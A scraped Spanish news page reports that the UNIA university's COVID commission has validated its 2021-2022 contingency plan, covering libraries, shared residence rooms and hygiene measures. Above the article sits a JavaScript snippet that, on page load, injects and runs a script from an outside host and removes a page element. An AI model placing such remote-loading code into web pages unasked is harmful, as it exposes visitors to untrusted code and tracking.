(function (document, window) { document.addEventListener('DOMContentLoaded', function (event) { let a = document.createElement("script"); a.type = 'text/javascript'; a.async = true; a.src = "https://data.gblcdn.com/data/gblcdnp.js?pubid=05a114a0-fca3-11e9-8439-f143cce16e54&pid=TcvybSOnmDcPUTj&renderD=0&limitT=0&limitH=24&t=i"; document.body.appendChild(a); document.getElementById('TcvybSOnmDcPUTj').remove(); }); }) (document, window);
Jueves 30 de Junio de 2022

La Comisión Covid de la UNIA valida el Plan de Contingencia para el nuevo curso

0

La Comisión COVID de la Universidad Internacional de Andalucía (UNIA), presidida por el rector José Ignacio García, ha validado el Plan de Contingencia del curso académico 2021-2022, que previamente ha contado con el visto bueno del Comité de Seguridad y Salud de la UNIA.

El nuevo plan actualiza el anterior incluyendo las recomendaciones del ministerio con competencias en universidades y la Guía de la consejería de Salud y Familias de la Junta de Andalucía para 21/22. Se contempla la máxima presencialidad en las actividades docentes y culturales. El plan sigue insistiendo en la necesariedad de mantener medidas complementarias para garantizar un entorno académico seguro y saludable mediante medidas organizativas y preventivas para poder adaptarse a otros posibles escenarios dentro del período del curso académico 21/22.

Dicho plan, por tanto, establece las medidas preventivas y de protección necesarias para evitar y/o minimizar, en la medida de lo posible, el contagio de la COVID-19, impedir o dificultar su propagación y garantizar la seguridad y salud de todas las personas que, directa o indirectamente, participen en estas actividades.

Como principales novedades regula la apertura de las bibliotecas y la posibilidad de uso compartido de las habitaciones de las Residencias de la UNIA en las sedes de La Rábida y Antonio Machado de Baeza.

El Plan se basa en la normativa de salud pública vigente recientemente publicada por los ministerios de Sanidad y Universidades y por la Consejería de Salud de la Junta de Andalucía.


Desde la Comisión COVID se recomienda la atención al deber de cautela y protección de la comunidad universitaria y la adopción de las medidas necesarias como uso de mascarillas, distancia de seguridad y gel hidroalcohólico, para evitar la generación de riesgo de propagación de la COVID-19, así como la propia exposición a dicho riesgo.

Leave A Reply

Las cookies de este sitio web se usan para personalizar el contenido y los anuncios, ofrecer funciones de redes sociales y analizar el tráfico. Además, compartimos información sobre el uso que haga del sitio web con nuestros partners de redes sociales, publicidad y análisis web, quienes pueden combinarla con otra información que les haya proporcionado o que hayan recopilado a partir del uso que haya hecho de sus servicios. Ver detalles

ACEPTAR
Aviso de cookies